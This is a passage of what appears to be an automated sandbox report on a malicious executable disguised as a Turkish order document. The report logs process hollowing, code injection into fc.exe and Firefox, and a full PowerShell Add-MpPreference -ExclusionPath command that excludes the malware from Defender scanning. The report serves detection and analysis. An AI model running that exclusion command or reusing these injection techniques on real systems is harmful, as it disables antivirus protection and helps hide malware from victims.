Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01914A35 mov eax, dword ptr fs:[00000030h] 3_2_01914A35
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01914A35 mov eax, dword ptr fs:[00000030h] 3_2_01914A35
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192CA24 mov eax, dword ptr fs:[00000030h] 3_2_0192CA24
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0191EA2E mov eax, dword ptr fs:[00000030h] 3_2_0191EA2E
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01900A5B mov eax, dword ptr fs:[00000030h] 3_2_01900A5B
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01900A5B mov eax, dword ptr fs:[00000030h] 3_2_01900A5B
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F6A50 mov eax, dword ptr fs:[00000030h] 3_2_018F6A50
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F6A50 mov eax, dword ptr fs:[00000030h] 3_2_018F6A50
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F6A50 mov eax, dword ptr fs:[00000030h] 3_2_018F6A50
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F6A50 mov eax, dword ptr fs:[00000030h] 3_2_018F6A50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe"
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe" Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtWriteVirtualMemory: Direct from: 0x76F0490C Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtOpenKeyEx: Direct from: 0x76F03C9C Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtReadVirtualMemory: Direct from: 0x76F02E8C Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtCreateKey: Direct from: 0x76F02C6C Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtSetInformationThread: Direct from: 0x76F02B4C Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtQueryAttributesFile: Direct from: 0x76F02E6C Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtQuerySystemInformation: Direct from: 0x76F048CC Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtOpenSection: Direct from: 0x76F02E0C Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtSetInformationThread: Direct from: 0x76EF63F9 Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtQueryValueKey: Direct from: 0x76F02BEC Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtCreateFile: Direct from: 0x76F02FEC Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtOpenFile: Direct from: 0x76F02DCC Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtQueryInformationToken: Direct from: 0x76F02CAC Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtTerminateThread: Direct from: 0x76F02FCC Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtOpenKeyEx: Direct from: 0x76F02B9C Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtSetInformationProcess: Direct from: 0x76F02C5C Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtNotifyChangeKey: Direct from: 0x76F03C2C Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtCreateMutant: Direct from: 0x76F035CC Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtMapViewOfSection: Direct from: 0x76F02D1C Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtResumeThread: Direct from: 0x76F036AC Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtReadFile: Direct from: 0x76F02ADC Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtQuerySystemInformation: Direct from: 0x76F02DFC Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtDelayExecution: Direct from: 0x76F02DDC Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtQueryInformationProcess: Direct from: 0x76F02C26 Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtResumeThread: Direct from: 0x76F02FBC Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtCreateUserProcess: Direct from: 0x76F0371C Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Memory written: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: NULL target: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: NULL target: C:\Windows\SysWOW64\fc.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Section loaded: NULL target: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Section loaded: NULL target: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Thread register set: target process: 7656 Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Thread APC queued: target process: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe" Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process created: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe" Jump to behavior
Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe Process created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000002.4152268703.0000000001000000.00000002.00000001.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000000.2057014672.0000000001000000.00000002.00000001.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000000.2223221907.0000000001351000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000002.4152268703.0000000001000000.00000002.00000001.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000000.2057014672.0000000001000000.00000002.00000001.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000000.2223221907.0000000001351000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000002.4152268703.0000000001000000.00000002.00000001.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000000.2057014672.0000000001000000.00000002.00000001.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000000.2223221907.0000000001351000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000002.4152268703.0000000001000000.00000002.00000001.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000000.2057014672.0000000001000000.00000002.00000001.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000000.2223221907.0000000001351000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
